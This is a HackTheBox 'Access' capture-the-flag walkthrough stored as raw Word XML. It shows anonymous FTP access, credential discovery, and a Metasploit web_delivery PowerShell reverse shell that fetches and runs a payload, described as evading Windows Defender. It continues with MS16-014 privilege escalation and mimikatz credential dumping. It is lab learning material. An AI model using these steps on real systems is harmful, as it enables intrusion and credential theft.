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19BB" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackTheBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8167E" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A16B95" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8D7FE" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D731333" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">As always, I am starting off with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Nmap scan to determine open ports. After the scan has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>completed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I will be able to determine my attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B462F9" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="42A0E372" w14:textId="2CF97C26" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3142740B" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A857D" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it looked like that RDP and telnet are open, FTP allows for anonymous login. When I tried to access the FTP service from the browser It seems that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cannot do it, ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8FEECA" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌but when I tried to login from the terminal it allowed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>me !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I was prompted for username so I just used Anonymous for user and blank password, since the header of Nmap output, showed that FTP allows for anonymous </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>access !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> There were 2 directories inside FTP service: Backups and Engineer. Backups folder contained a file called "backup.mdb" and folder Engineer contained a zip file "Account Access.zip". I ran strings command on backups.mdb and I found‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8A82D" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌several interesting things: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E8BCA9" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="459A71F7" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>admin ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrator, engineer, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backup_admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, access4u@security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5112F103" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">The last one access4u@security looked more like a password and so I passed it to the zip file: Access Control.zip and it worked so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extracted the file inside. Now the file inside the compressed file had an extension ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">" so I used a tool called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readpst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to convert the file and read it with any kind of editor. After I opened the file, I found some information about an account on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB4E996" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="5D72161A" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC6D1E3" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="276DDA88" w14:textId="7A1C8C67" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6566F4" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B666D" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">I used the found credentials in the Microsoft Telnet Service (port 3389) and it prompted me with a shell. So now I was inside the system and I could run commands. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D3A08" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857FC81" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727EB228" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After enumerating the system, I didn't find anything, so I decide to upload a windows enumeration script to find something for me. I have immediately discovered that I wasn't allowed to use backspace and arrows to quickly navigate through commands. I have decided to get a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session, but after trying to get through payload execution on the system it didn't work, so I opted to get a web based reverse shell, using the module 'exploit/multi/script/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web_delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">'. What this module will do, is to generate a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command, which will be base64 encrypted to evade windows defender and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will also open a web server on my machine so that when I execute the command in the telnet session, the windows box will access my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web server, grab the payload and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185ABCF" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="001CE0AC" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">As for the enumeration script, I used Sherlock (made by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RastaMouse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). This script is going to check for missing patches &amp; software as well as show possible ways of privilege escalation. ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3CA00" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌When the script finished the enumeration, I saw that script has found a common way of privilege escalation in Windows, Secondary Logon Handle, CVE: MS16-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>032!‌</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33C94B16" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌Once I tested the exploit it did not work, so I would assume at this point that the system was patched against this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C525A57" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="0E60A329" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>#In Metasploit ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C60106C" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ use multi/script/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>web_delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62BF5F" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73548BEE" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89235F" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌#Had some error with this exploit saying </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not compatible so running this command fixed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EBB5E" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌ ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306E667" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌$ set target 2 ----&gt;#Sets payload delivery via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1F4C7" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌$ set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LHOST  ‌</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DD85DC5" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ set LPORT &lt;&gt; ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6092227C" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ exploit -j ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141D9AB" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648612B" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌#Copy command from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; run on target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>machine !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="128F3904" w14:textId="34433A03" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8B03CE" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DB5E6" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D81E01" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I now had 2 shells as user 'security', one telnet &amp; one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session. As MS16-032 did not worked, I have checked to see the closest exploit to date to MS16-032 and it was the MS16-014. Metasploit has a post exploitation module which uses this exploit to escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B040A52" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="350CAC4E" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">In Metasploit after I get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423AEEDF" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EAC63D" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; background ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3FB35" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ search ms16-014 ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89136B" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ use exploit/windows/local/ms16_014_wmi_recv_notif ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAD0C0" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ set session 1‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E750B5" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12100C71" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583BFDF5" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A89F5" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">This privilege escalation exploit spawned me in shell session instead of in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as NT_AUTHORITY user, so I quickly changed it to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session using a post module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDB2956" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="4BCD9DF6" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>#Switch from Shell -&gt; Meterpreter ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31B86A" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C9060" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌ctrl + z ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB92DB" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ use post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDCF8D" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌$ set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LHOST  ‌</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F100E97" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ set LPORT &lt;&gt; ‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CA3CE" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌$ set session 2‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4CD82" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌$ exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437CCC7E" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD89E8E" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034774B2" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">At this point, I tried to read the flag, but with no luck! </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Interestingly enough, I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wasn't able to do because I didn't have permission and I was NT_AUTHORITY so it was really weird. My attempt to this was to grab the password for the Administrator user using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (developed by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gentlekiwi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>). I uploaded the tool, and ran it, and I grabbed the password for user Administrator. After this, I opened another telnet session and logged in as Administrator and now I was able to read the root flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67549299" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11"/>
    <w:p w14:paraId="424F0DED" w14:textId="121562D4" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD627B8" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBEA9E4" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8866F8" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t>‌</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E31B73" w14:textId="77777777" w:rsidR="00145E11" w:rsidRDefault="00145E11" w:rsidP="00145E11">
      <w:r>
        <w:t xml:space="preserve">‌This is how to do Access from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackTheBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AAECD" w14:textId="77777777" w:rsidR="00F07790" w:rsidRDefault="00F07790"/>
    <w:sectPr w:rsidR="00F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67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ED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590E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73FA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C6FD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="254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24EC8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AB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03B0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63E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752DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="995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40BED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B9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22960"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F61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5059D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BD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64F1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4C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0632B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E8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A58A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35C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65A9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE8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33"/>
    <w:rsid w:val="00145E11"/>
    <w:rsid w:val="00200733"/>
    <w:rsid w:val="002F7164"/>
    <w:rsid w:val="00F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78F5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E30D40B9-808B-4C65-AFE4-68D8B263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33F44"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="333F44"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="333F44"/>
                        <w:right w:val="single" w:sz="6" w:space="0" w:color="333F44"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="14908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55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57087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7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7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0062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349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102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4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9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4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263238"/>
                                                    <w:left w:val="single" w:sz="6" w:space="0" w:color="37525E"/>
                                                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="263238"/>
                                                    <w:right w:val="single" w:sz="6" w:space="0" w:color="263238"/>
                                                  </w:divBdr>
                                                  <w:divsChild>
                                                    <w:div w:id="40357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1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4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4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8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04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2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46370">
                                                                  <w:marLeft w:val="0"/>
                                                                  <w:marRight w:val="0"/>
                                                                  <w:marTop w:val="105"/>
                                                                  <w:marBottom w:val="60"/>
                                                                  <w:divBdr>
                                                                    <w:top w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                                    <w:left w:val="single" w:sz="6" w:space="6" w:color="2D3031"/>
                                                                    <w:bottom w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                                    <w:right w:val="single" w:sz="6" w:space="6" w:color="2D3031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15152">
                                                          <w:marLeft w:val="150"/>
                                                          <w:marRight w:val="0"/>
                                                          <w:marTop w:val="105"/>
                                                          <w:marBottom w:val="60"/>
                                                          <w:divBdr>
                                                            <w:top w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                            <w:left w:val="single" w:sz="6" w:space="6" w:color="2D3031"/>
                                                            <w:bottom w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                            <w:right w:val="single" w:sz="6" w:space="6" w:color="2D3031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61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86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91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3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5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64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33F44"/>
                                                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="333F44"/>
                                                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="333F44"/>
                                                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="333F4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7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33F44"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="333F44"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="333F44"/>
                        <w:right w:val="single" w:sz="6" w:space="0" w:color="333F44"/>
                      </w:divBdr>
                    </w:div>
                    <w:div w:id="9501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7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0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7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4451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73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4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476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9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0279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87256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0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1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7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263238"/>
                                                    <w:left w:val="single" w:sz="6" w:space="0" w:color="37525E"/>
                                                    <w:bottom w:val="single" w:sz="6" w:space="0" w:color="263238"/>
                                                    <w:right w:val="single" w:sz="6" w:space="0" w:color="263238"/>
                                                  </w:divBdr>
                                                  <w:divsChild>
                                                    <w:div w:id="153511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8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3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8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0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2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1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47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747175">
                                                                  <w:marLeft w:val="0"/>
                                                                  <w:marRight w:val="0"/>
                                                                  <w:marTop w:val="105"/>
                                                                  <w:marBottom w:val="60"/>
                                                                  <w:divBdr>
